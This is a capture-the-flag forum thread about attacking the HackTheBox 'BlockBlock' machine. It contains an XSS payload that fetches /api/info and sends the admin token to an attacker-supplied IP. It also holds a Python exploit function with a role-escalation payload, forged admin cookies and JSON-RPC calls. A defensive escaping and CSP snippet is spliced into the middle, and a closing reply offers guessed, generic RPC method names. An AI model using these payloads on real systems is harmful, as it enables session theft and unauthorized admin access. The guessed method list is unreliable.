Hackthebox - BlockBlock

BlockBlock solve

1 Like

XSS in Report User:
">

1 Like

Improved reliability of bot on box.

1 Like

Anyone know how to bypass this issue? {"error":"Proxy Couldn't verify token"}

1 Like

You can steal the admin token like this:

fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://YOUR_IP/log?' + btoa(text), {
        mode: 'no-cors'
    });
});

And with the admin token you can successfully access /admin. From there you will see an endpoint /api/json-rpc

1 Like
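As an added defender-side example (my code, not from the thread or the box): the Report User field rendered unescaped beside its escaped form, and a small connect-src evaluator showing why a "connect-src 'self'" policy would have blocked the cross-origin fetch used above to carry the token off-site. The sample report, the page origin and the attacker host are constructed placeholders.

```python
import html
import re
from urllib.parse import urljoin, urlsplit

# Constructed sample report text, shaped like the payload the thread injects
# through the Report User field (not a value taken from the box).
REPORT = '<img src=x onerror="fetch(\'/api/info\')">'


def render_report_unsafe(username: str, reason: str) -> str:
    """Vulnerable pattern: untrusted fields dropped straight into the admin page."""
    return f"<li><b>{username}</b>: {reason}</li>"


def render_report_safe(username: str, reason: str) -> str:
    """Hardened: every untrusted field is HTML-escaped before the admin bot sees it."""
    return f"<li><b>{html.escape(username)}</b>: {html.escape(reason)}</li>"


def contains_event_handler(fragment: str) -> bool:
    """Crude check: does a tag with an on* handler survive into the rendered HTML?"""
    return re.search(r"<\s*\w+[^>]*\bon\w+\s*=", fragment, re.I) is not None


def csp_allows_connect(policy: str, page_origin: str, target_url: str) -> bool:
    """Tiny connect-src evaluator for a CSP subset ('self', 'none', '*', host sources)."""
    # Models only whether a fetch() from page_origin to target_url is permitted;
    # a real browser applies the full CSP3 matching rules.
    directives = {}
    for directive in policy.split(";"):
        parts = directive.split()
        if parts:
            directives[parts[0].lower()] = parts[1:]
    sources = directives.get("connect-src", directives.get("default-src"))
    if sources is None:
        return True  # no applicable directive: connections are unrestricted
    target = urlsplit(urljoin(page_origin, target_url))
    target_origin = f"{target.scheme}://{target.netloc}"
    for source in sources:
        src = source.strip("'").lower()
        if src == "none":
            return False
        if src == "*" or src in (target_origin, target.netloc):
            return True
        if src == "self" and target_origin == page_origin:
            return True
    return False
```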
import requests  # required by the snippet; the import was not shown in the post

print_msg = print  # assumed stand-in for the poster's helper, which the thread does not show


def do_lol(self, line):
    """
    Exploits a target by injecting a malicious payload and collecting admin information.
    This function performs the following steps:
    1. Logs in to the application with provided credentials.
    2. Injects a malicious payload to elevate the role of a user to 'admin.'
    3. Executes a secondary payload to exfiltrate admin tokens by abusing '/api/info.'
    4. Prepares for further exploitation using '/admin' and '/api/json-rpc'.
    Parameters:
    line (str): Additional parameters for the target.
    Returns:
    None
    """
    rhost = self.params["rhost"]
    url = f'http://{rhost}'
    lhost = self.params["lhost"]

    # Note: this XSS payload is built but never sent anywhere in the excerpt as posted.
    payload = (
        "<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, "
        "body: JSON.stringify({ 'username': 'grisun0', 'role': 'grisun0'})})\" />"
    )
    headers = {
        "Content-Type": "application/json"
    }
    s = requests.Session()
    print_msg(f"Logging in and sending payload to {url}")
    login_response = s.post(f'{url}/api/login', headers=headers, json={"username": "grisun0", "password": "grisun0"})
    if login_response.status_code == 200:
        print_msg("Login successful. Injecting primary payload.")
        # Cookie and token values below are as the poster left them; the elided parts are not filled in.
        s.cookies.set("role", "admin", domain="blockblock.htb", path="/")
        s.cookies.set(
            "token",
            "eyJhbGciOi..............PJK18ySGlcZ_16dt9-UnKeX2fnM",
            domain="blockblock.htb",
            path="/",
        )
        s.cookies.set("username", "admin", domain="blockblock.htb", path="/")
        jwt_secret = {"Authorization": "34fd1a8cb0b16.........bf2a5d3b9"}
        chat_address = "0x1234567890abcdef1234567890abcdef12345678"
        url = f"{url}/api/json-rpc"
        headers = {
            "Content-Type": "application/json",
            "token": jwt_secret["Authorization"],
        }
        # JSON-RPC request; `line` is the method name passed in by the caller.
        payload = {
            "jsonrpc": "2.0",
            "method": f"{line}",
            "params": ["latest", False],
            "id": 1
        }
        print_msg(payload)
        response = s.post(url, headers=headers, json=payload)
        print_msg(response.json())

        return
1 Like

Thanks mate, if I may ask, do you know what {line} should be replaced with?

1 Like

The {line} parameter in the payload for the JSON-RPC request is where you specify the method you want to call on the target API. This value depends on the available methods provided by the target’s JSON-RPC API and what you aim to achieve. Here are some possibilities based on typical JSON-RPC APIs:

  1. Common Admin Methods:
  • "getAdminInfo": If you want to retrieve admin-related information.
  • "listUsers": To get a list of users in the application.
  • "updateSettings": To modify application settings.
  • "deleteUser": To delete a specific user.
  • "resetPassword": To reset an account’s password.
1 Like